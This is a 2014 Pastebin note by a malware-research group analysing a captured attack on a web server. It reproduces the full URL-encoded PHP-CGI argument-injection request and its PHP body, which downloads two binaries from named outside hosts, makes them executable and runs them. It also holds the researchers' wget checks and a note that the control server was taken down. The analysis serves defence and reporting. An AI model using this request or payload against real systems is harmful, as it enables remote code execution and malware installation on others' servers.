SHARE
TWEET

I'm a mu mu mu? Just a Crap!

MalwareMustDie Jul 27th, 2014 408 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie sCRAPnote
  2. // I'm a mu mu mu ? Is a lamer crap!
  3.  
  4. POST /cgi-bin/phpinfo.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
  5. Host: xxx.xxx.xxx.xxx
  6. User-Agent: I`m a mu mu mu ?
  7. Content-Type: application/x-www-form-urlencoded
  8. Content-Length: 502
  9. Connection: close
  10. <?php
  11. $tmp = sys_get_temp_dir();
  12. $path = getcwd();
  13. $file = "e.html";
  14. $url = "http://eleven11root.servepics.com";
  15. system("wget $url -P - -O" . $tmp . "/e.html");
  16. system("chmod -R 777" . $tmp ."/e.html");
  17. chmod ($tmp."/".$file,0777);
  18. system($tmp . "/e.html");
  19. $file2 = "t.htm";
  20. $url2 = "http://twelfe12root.servepics.com";
  21. system("wget $url2 -P - -O" . $tmp . "/t.htm");
  22. system("chmod -R 777" . $tmp ."/t.htm");
  23. chmod ($tmp."/".$file2,0777);
  24. system($tmp . "/t.htm");
  25. echo $tmp;
  26. echo $path;
  27. die($tmp);
  28.  
  29. / infected site dropped binaries /
  30. wget http://eleven11root.servepics.com -P - -O ./e.html
  31. wget http://twelfe12root.servepics.com -P - -O ./t.html
  32.  
  33. / header checks /
  34. --2014-07-25 12:48:57--  http://twelfe12root.servepics.com/
  35. Resolving twelfe12root.servepics.com... 8.23.224.90
  36. Caching twelfe12root.servepics.com => 8.23.224.90
  37. Connecting to twelfe12root.servepics.com|8.23.224.90|:80... connected.
  38. Created socket 4.
  39. Releasing 0x00007fc878404890 (new refcount 1).
  40. GET / HTTP/1.1
  41. User-Agent: MMDBangsMyget/1.14 (MalwareMustDie12.2.1)
  42. Accept: **
  43. Host: twelfe12root.servepics.com
  44. Connection: Keep-Alive
  45. HTTP request sent, awaiting response...
  46. HTTP/1.1 302 Found
  47. Date: Fri, 25 Jul 2014 03:48:58 GMT
  48. Server: Apache/2.2.3 (CentOS)
  49. X-Powered-By: PHP/5.1.6
  50. Location: http://127.0.0.1
  51. Content-Length: 0
  52. Connection: close
  53. Content-Type: text/html; charset=UTF-8
  54. 302 Found
  55. Location: http://127.0.0.1 [following]
  56. Closed fd 4
  57. Connecting to 127.0.0.1:80... Closed fd 4
  58. failed: Connection refused.
  59. Releasing 0x00007fc878403ed0 (new refcount 0).
  60. Deleting unused 0x00007fc878403ed0.
  61.  
  62. / Encryption analysis /
  63. %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
  64.  
  65. / crack result /
  66. https://twitter.com/MalwareMustDie/status/492534140340682754
  67.  
  68. / status /
  69. CNC was knocked down, @MMD Tango Team
  70. different case, same incident: http://pastebin.com/VePW1zGP
  71.  
  72. #MalwareMustDie | cracked & reported by @unixfreaxjp
RAW Paste Data
Top